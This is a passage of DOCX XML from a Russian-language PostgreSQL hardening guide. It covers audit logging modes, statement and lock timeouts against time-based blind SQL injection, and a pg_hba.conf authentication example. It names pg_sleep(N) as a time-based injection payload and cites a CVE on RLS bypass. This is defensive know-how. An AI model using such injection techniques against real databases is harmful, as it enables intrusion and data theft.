          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2025-8713 — custom operator через расширение для RLS-обхода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Конфиги PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf</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 два главных места, где defaults в managed-deployments обычно адекватны, а в self-hosted кластерах часто упрощены. Раздел перечисляет параметры, влияющие на категории 3.X и на observability injection-попыток. Логирование как отдельная техника — в 5.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Логи: что писать, в каком объёме</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_messages = warning        # сервер пишет от warning и выше</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_error_statement = error   # на каждом ERROR пишет вызвавший SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = 'mod'              # 'none' / 'ddl' / 'mod' / 'all'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_duration = off                 # включать только при targeted investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_line_prefix = '%t [%p] %r %u@%d '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_connections = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_disconnections = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_temp_files = 0                 # любой temp file пишется в log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_lock_waits = on                # waits longer than deadlock_timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`log_statement` режимы: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none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ничего. Никогда в production: теряем audit-канал.</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ddl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — только DDL (CREATE/ALTER/DROP). Подходит для observability миграций.</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mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DDL + DML модификации (INSERT/UPDATE/DELETE/TRUNCATE). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рекомендуемый default для production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all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — каждая команда. Очень шумно, использовать только при targeted investigation или с pgaudit вместо.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trade-off </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">all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mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пропускает SELECT-инъекции (UNION-канал, error-based, blind-channels) — все они через SELECT. Для critical-business deployments — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на критичных таблицах через pgaudit (5.6), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> глобально.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита от 3.4 (time-based blind) и 3.10.2 (CTE-amplified time)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основной payload time-based-инъекции. Сервер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-функция не имеет лимита, но statement-timeout прерывает запросы суммарно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf — глобальный лимит</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = 30000                # 30 секунд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lock_timeout = 10000                     # 10 секунд на acquire lock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">idle_in_transaction_session_timeout = 60000  # 60 сек idle в транзакции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = 30000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — компромисс между legitimate long queries и time-based-detection. Если запрос с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(60)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отрабатывает за 30 сек по тайм-ауту, атакующий получает ambiguous сигнал (не знает, прошло ли true / false): boolean-blind становится unreliable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Per-role override для аналитических ролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE analytics_role SET statement_timeout = '300s';  -- 5 минут</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE app_role SET statement_timeout = '5s';          -- ультрастрого</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lock_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельный таймер для acquire lock. Защищает от DoS через advisory-locks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_advisory_lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) от роли с этим грантом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">idle_in_transaction_session_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывает зомби-транзакции, которые могут удерживать locks или table-визибилити.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_hba.conf — аутентификация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># TYPE  DATABASE        USER            ADDRESS                 METHOD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">local   all             postgres                                peer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">local   all             all                                     scram-sha-256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host    all             all             127.0.0.1/32            scram-sha-256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host    app_db          app_role        10.0.0.0/8              scram-sha-256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hostssl all             replication     10.0.0.0/8              scram-sha-256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host    all             all             0.0.0.0/0               reject</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правила: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trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
